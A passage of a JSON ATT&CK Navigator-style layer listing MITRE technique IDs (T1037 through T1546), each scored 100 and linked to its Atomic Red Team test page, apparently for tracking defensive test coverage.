.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},